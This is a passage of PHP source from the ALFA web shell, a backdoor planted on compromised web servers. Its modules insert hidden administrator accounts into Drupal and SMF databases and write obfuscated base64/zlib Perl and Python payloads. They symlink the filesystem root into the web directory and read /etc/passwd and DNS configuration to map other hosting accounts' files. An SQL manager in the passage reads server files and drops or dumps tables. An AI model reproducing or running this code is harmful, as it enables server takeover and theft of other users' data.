 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)

 );

create_table($table);

echo '
';

if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){

$localhost = $_POST['alfa2'];

$database = $_POST['alfa4'];

$username = $_POST['alfa5'];

$password = $_POST['alfa6'];

$admin = $_POST['alfa8'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");

$getDescuid = @mysqli_fetch_assoc($getDescuid);

$getDescuid = $getDescuid['uid'];

$getdescuid = $getDescuid++;

$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));

$sole = mysqli_num_rows($solevisible);

if ($sole == 1){

$solevis = mysqli_fetch_assoc($solevisible);

$res = $solevis['uid'];

}

$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');}

}

}



if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){



echo __pre().'
| SMF |
'.getConfigHtml('smf').'
>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';

$table = array('td1' =>

 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),

 'td2' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),

 'td3' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),

 'td4' =>

 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),

 'td5' =>

 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),

 'td6' =>

 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),

 'td7' =>

 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),

 );

create_table($table);

echo '
';

if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){

$localhost = $_POST['alfa2'];

$database = $_POST['alfa3'];

$username = $_POST['alfa5'];

$password = $_POST['alfa6'];

$prefix = $_POST['alfa7'];

$admin = $_POST['alfa8'];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$setpwAlg = sha1(strtolower($admin) . 'solevisible');

$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));

if($solevisible){

__alert('Success... '.$admin.' is created...');}

}

}

echo "
";

alfafooter();

}

function alfaMakePwd(){

    if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){

        return "/home/{user}/public_html/";

    }

    $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);

    $public = end($document);

    array_pop($document);

    array_pop($document);

    $path = implode("/", $document) . "/{user}/" . $public;

    return $path;

}

function alfaGetDomains($state = false){

    $state = "named.conf";

    $lines = array();

    $lines = _alfa_file('/etc/named.conf');

    if(!$lines){

        $lines = @scandir("/etc/valiases/");

        $state = "valiases";

        if(!$lines){

            $lines = @scandir("/var/named");

            $state = "named";

            if(!$lines && $state){

                $lines = _alfa_file('/etc/passwd');

                $state = "passwd";

            }

        }

    }

    return array("lines" => $lines, "state" => $state);

}

function alfaCreateParentFolder(){

    $parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;

    if(!@is_dir($parent)){

        @mkdir($parent, 0755, true);

    }

}

function alfasymlink(){

alfahead();

AlfaNum(9,10);

alfaCreateParentFolder();

@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);

echo '

| Symlink |
| Symlink( php ) | | Symlink( perl ) | | Symlink( python ) | | File Symlink | 
';

if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){

    $sympath = alfaMakePwd();

    @mkdir('cgialfa',0755);

    @chdir('cgialfa');

    alfacgihtaccess('cgi');

    $perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;my $alfa_data="'.__ALFA_DATA_FOLDER__.'";eval(Compress::Zlib::memGunzip(decode_base64("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")));';

    $py = '#!/usr/bin/python'."\nimport zlib, base64\nalfa_data='".__ALFA_DATA_FOLDER__."'\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'\',\'exec\'))';

    $cginame = "symperl.alfa";

    $source = $perl;

    $lang = "perl";

    if($_POST["alfa2"]=="sympy"){

        $cginame = "pysymlink.alfa";

        $source = $py;

        $lang = "python";

    }

    @__write_file($cginame,$source);

    @chmod($cginame,0755);

    echo __pre();

    $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);

    if(strlen($resource) == 0){

        echo AlfaiFrameCreator('cgialfa/'.$cginame);

    }else{

        echo $resource;

    }

}

if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){

if(function_exists('symlink')||_alfa_can_runCommand(true,true)){

AlfaNum(9,10);

echo __pre().'


| Symlink File And Directory |








';

$path = $_POST['alfa5'];

$symname = $_POST['alfa6'];

$solevisible58 = $_POST['alfa7'];

if($solevisible58){

$new_name = str_replace(".", "_", basename($symname));

$rand_dir = $new_name.rand(111,9999);

$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';

@mkdir($sym_dir, 0777, true);

alfacgihtaccess('sym', $sym_dir, $symname);

_alfa_symlink("$path","$sym_dir/$symname");

echo __pre();

echo '
Click >> '.$symname.'
';

}

}else{echo "
[+] Symlink Function Disabled !
";}

}

if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){

$cant_symlink = true;

if(function_exists('symlink')||_alfa_can_runCommand(false,false)){

@mkdir('alfasymlink',0777);

alfacgihtaccess('sym','alfasymlink/');

_alfa_symlink('/','alfasymlink/root');

$table_header = "

";

if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){

echo "
";

$lines = array();

$anony_domains = array();

$anonymous_users = array();

$f_black = array();

$error = false;

$anonymous = false;

$makepwd = "/home/{user}/public_html/";

$domains = alfaGetDomains();

$lines = $domains["lines"];

$state = $domains["state"];

$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");

$can_runcmd = _alfa_can_runCommand(false,false);

if(!$is_posix && !$can_runcmd){

    $anonymous = true;

    $anony_domains = $domains["lines"];

    $lines = _alfa_file('/etc/passwd');

}

echo $table_header;

$count=1;

$template = '
';

foreach($lines as $line){

    $domain = "";

    $owner = "";

    if($anonymous){

        $explode = explode(":", $line);

        $owner = $explode[0];

        $owner_len = strlen($owner) - 1;

        $userid = $explode[2];

        if((int)$userid < 500)continue;

        $domain = "[?????]";

        $temp_black = array();

        $finded = false;

        foreach($anony_domains as $anony){

            if($state == "named.conf"){

                if(@strstr($anony, 'zone')){

                    preg_match_all('#zone "(.*)"#',$anony, $data);

                    $domain = $data[1][0];

                }else{

                    continue;

                }

            }elseif($state == "named" || $state == "valiases"){

                if($anony == "." || $anony == "..")continue;

                if($state == "named")$anony = rtrim($anony, ".db");

                $domain = $anony;

            }

            $sub_domain = str_replace(array("-","."), "", $domain);

            if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){

                if(in_array($owner.$domain, $temp_black))continue;

                $sympath = str_replace("{user}", $owner, $makepwd);

                $http = "http://".$domain;

                echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);

                $count++;

                $temp_black[] = $owner.$domain;

                $finded = true;

            }

        }

        if(!$finded){

            $anonymous_users[] = $owner;

        }

    }else{

         if($state == "named.conf"){

            if(@strstr($line, 'zone')){

                preg_match_all('#zone "(.*)"#',$line, $data);

                $domain = $data[1][0];

            }else{

                continue;

            }

        }elseif($state == "named" || $state == "valiases"){

            if($line == "." || $line == "..")continue;

            if($state == "named")$line = rtrim($line, ".db");

            $domain = $line;

        }

        if(strlen(trim($domain)) > 2 && $state != "passwd"){

            if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;

            if($is_posix){

                $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));

                $owner = $user["name"];

            }elseif($can_runcmd){

                $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);

            }

        }

    }

    if(!$anonymous){

        if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;

        $sympath = str_replace("{user}", $owner, $makepwd);

        $http = "http://".$domain;

        if($state == "passwd"){

            $http = "javascript:alert('we cant find domain...')";

        }

        echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);

        $count++;

        $f_black[] = $owner.$domain;

    }

}

if($anonymous){

    foreach($anonymous_users as $owner){

        $sympath = str_replace("{user}", $owner, $makepwd);

        $http = "javascript:alert('we cant find domain...')";

        echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);

        $count++;

    }

}

$cant_symlink = false;

}else{

$is_direct = false;

$makepwd = alfaMakePwd();

if(_alfa_file_exists("/etc/virtual/domainowners")){

    $makepwd = "/home/{user}/public_html";

    $is_direct = true;

}

$sole = _alfa_file("/etc/virtual/domainowners");

$count=1;

echo $table_header;

$template = '';

if($sole){

    foreach($sole as $visible){

        if(@strstr($visible,":")){

            $solevisible = explode(':', $visible);

            $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);

            echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);

        }

    }

}else{

    $passwd = _alfa_file("/etc/passwd");

    if($passwd){

        $html = "";

        $is_named = false;

        $users = array();

        $domains = array();

        $uknowns = array();

        foreach($passwd as $user){

            $user = trim($user);

            $expl = explode(":", $user);

            if((int)$expl[2] < 500)continue;

            $users[$expl[0]] = $expl[5];

        }

        $site_domains = @scandir("/etc/virtual/");

        if(!$site_domains){

            $site_domains = alfaEx("ls /etc/virtual/");

            $site_domains = explode("\n", $site_domains);

            if(!$site_domains){

                $site_domains = _alfa_file("/etc/named.conf");

                if($site_domains){$is_named = true;}

            }

        }

        foreach($site_domains as $line){

            if($is_named){

                if(@strstr($line, 'zone')){

                    preg_match_all('#zone "(.*)"#',$line, $data);

                    $domain = $data[1][0];

                    if(strlen($domain  > 2) && !empty($domain)){

                        $domains[] = $domain;

                    }

                }

            }else{

                $domains[] = $line;

            }

        }

        $x = 1;

        foreach($users as $user => $home){

            foreach($domains as $domain){

                $user_len = strlen($user) - 1;

                $sub_domain = str_replace(array("-","."), "", $domain);

                $five_user = substr($user, 0,$user_len);

                $five_domain = substr($sub_domain, 0,$user_len);

                if($five_user == $five_domain){

                    if($is_direct){

                        $cwd = str_replace("{user}", $user, $makepwd);

                    }else{

                        $expl = explode("}/", $makepwd);

                        $cwd = $home."/".$expl[1];

                    }

                    $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);

                }else{

                    $uknowns[$user] = $home;

                }

            }

        }

        $uknowns = array_unique($uknowns);

        foreach($uknowns as $user => $home){

            if($is_direct){

                $cwd = str_replace("{user}", $user, $makepwd);

            }else{

                $expl = explode("}/", $makepwd);

                $cwd = $home."/".$expl[1];

            }

            $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);

        }

        echo($html);

    }

}

echo "
*DomainsUserssymlink
{count}{domain} {owner}Symlink
{count}{url} {user}Symlink
";

$cant_symlink = false;

}

}else{

    echo "
[+] Symlink Function Disabled !
";

    $cant_symlink = false;

}

if($cant_symlink)echo '

Error...
';

echo "
";
}
echo "
";
alfafooter();
}
function alfasql(){
class DbClass{
public $type;
public $link;
public $res;
public $mysqli_connect_error = false;
public $mysqli_connect_error_msg = "";
function __construct($type){
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type){
case 'mysql':
if($this->link = @mysqli_connect($host,$user,$pass,$dbname)){
    return true;
}else{
    $this->mysqli_connect_error = true;
    $this->mysqli_connect_error_msg = mysqli_connect_error();
    return false;
}
break;
case 'pgsql':
$host = explode(':', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case 'mysql':
if(@mysqli_select_db($db))return true;
break;
}
return false;
}
function query($str){
switch($this->type){
case 'mysql':
return $this->res = @mysqli_query($this->link,$str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch(){
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case 'mysql':
return @mysqli_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case 'mysql':
return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables(){
switch($this->type){
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error(){
switch($this->type){
case 'mysql':
return @mysqli_error($this->link);
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysqli_set_charset($this->link,$str);
else
$this->query('SET CHARSET '.$str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str){
switch($this->type){
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
$r=array();
while($i=$this->fetch())
$r[] = $i['file'];
$this->query('drop table solevisible');
return array('file'=>implode("\n",$r));
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
alfahead();
$form_visibility = "table";
if(isset($_POST['sql_host'])){
    $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
    if($connection_db && !empty($_POST['sql_base'])){
        $form_visibility = "none";
    }
}
$database_list = array();
echo "
".($form_visibility!="none"?"
| Sql Manager |

".getConfigHtml('all')."

":"")."









TYPE
HOST
DB USER
DB PASS
DB NAME
";
$tmp = "";
if(isset($_POST['sql_host'])){
if($connection_db){
$db->setCharset('utf8');
$db->listDbs();
echo "';
}else{
    echo $tmp;
}
}else
echo $tmp;
$curr_mysql_id = $_POST['current_mysql_id'];
echo "
count the number of rows
";
if($db->mysqli_connect_error){
    echo '
'.$db->mysqli_connect_error_msg.'
';
}
if(!empty($curr_mysql_id)){
    $sql_title_db = "";
    if(!empty($_POST['sql_base'])){
        $sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';";
    }
    echo "";
}
if(isset($db) && $db->link){
if(!empty($_POST['sql_base'])){
echo "
<<
'Expand/Collapse
    ";
    foreach ($database_list as $db_name) {
        echo '
  • Expand/Collapse
    '.$db_name.'
    ';
        if($db_name == $_POST['sql_base']){
            $db->selectdb($_POST['sql_base']);
            $tbls_res = $db->listTables();
            echo '
      • ';
              while($item = $db->fetch($tbls_res)){
              list($key, $value) = each($item);
              if(!empty($_POST['sql_count']))
              $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
              $value = htmlspecialchars($value);
              echo "
    •  ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
      • ";
              }
              echo '
    ';
        }
        echo "
    • ";
    }
    echo "
Result
Query
Search
Structure
Insert
Edit
Query:

";
echo "";
}else{
echo htmlspecialchars($db->error());
}
echo '';
alfafooter();
}
function alfaSql_manager_api(){
    $db = $_POST["alfa1"];
    $type = $_POST["alfa2"];
    $sql_count = $_POST["alfa3"] == "true" ? true : false;
    $db = @json_decode($db, true);
    $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);
    @mysqli_set_charset($conn, "utf8");
    if($conn){
        if($type == "load_all_tables"){
            $tables = array();
            $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('".implode("','", $db["databases"])."');");
            $count = 0;
            while($row = @mysqli_fetch_assoc($q_tables)){
                if($sql_count){
                    $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row["table_schema"].'`.`'.$row["table_name"].'`');
                    if($count_q){
                        $count = @mysqli_fetch_row($count_q);
                        $count = $count[0];
                    }
                }
                $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count);
            }
            foreach($db["databases"] as $db){
                if(!isset($tables[$db])){
                    $tables[$db] = null;
                }
            }
            echo @json_encode($tables);
        }elseif($type == "dump_drop"){
            if($db["mode"] == "drop"){
                foreach ($db["tables"] as $table) {
                    @mysqli_query($conn, "DROP TABLE `".$table."`;");
                }
                $tables = array();
                $q_tables = @mysqli_query($conn, "SHOW TABLES;");
                $count = 0;
                while($row = @mysqli_fetch_array($q_tables)){
                    if($sql_count){
                        $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`');
                        if($count_q){
                            $count = @mysqli_fetch_row($count_q);
                            $count = $count[0];
                        }
                    }
                    $tables[] = array("name" => $row[0], "count" => (int)$count);
                }
                echo @json_encode($tables);
            }else{
                if(strlen(alfaEx("mysqldump"))>0){
                    alfaEx("mysqldump --single-transaction --host=\"".$db["host"]."\" --user=\"".$db["user"]."\" --password=\"".$db["pass"]."\" ".$db["db"]." ".implode(" ", $db["tables"])."  > ".$db["dump_file"]);
                }else{
                    $fp = @fopen($db["dump_file"], "w");
                    foreach ($db["tables"] as $table) {
                        $res = @mysqli_query($conn, 'SHOW CREATE TABLE `'.$table.'`');
                        $create = @mysqli_fetch_array($res);
                        $sql = "DROP TABLE IF EXISTS `".$table."`;\n" . $create[1].";\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $tbl_data = @mysqli_query($conn, 'SELECT * FROM `'.$table.'`');
                        $head = true;
                        while($item = @mysqli_fetch_assoc($tbl_data)){
                            $columns = array();
                            foreach($item as $k=>$v) {
                            if($v == null)
                            $item[$k] = "''";
                            elseif(is_numeric($v))
                            $item[$k] = $v;
                            else
                            $item[$k] = "'".@mysqli_real_escape_string($conn, $v)."'";
                            $columns[] = "`".$k."`";
                            }
                            if($head) {
                            $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
                            $head = false;
                            } else
                            $sql = "\n\t,(".implode(", ", $item).')';
                            if($fp) fwrite($fp, $sql); else echo($sql);
                        }
                        if(!$head)
                            if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
                    }
                }
                echo @json_encode(array("status" => true, "file" => $db["dump_file"]));
            }
        }elseif($type == "load_tables"){
            $tables = array();
            $q_tables = @mysqli_query($conn, "SHOW TABLES;");
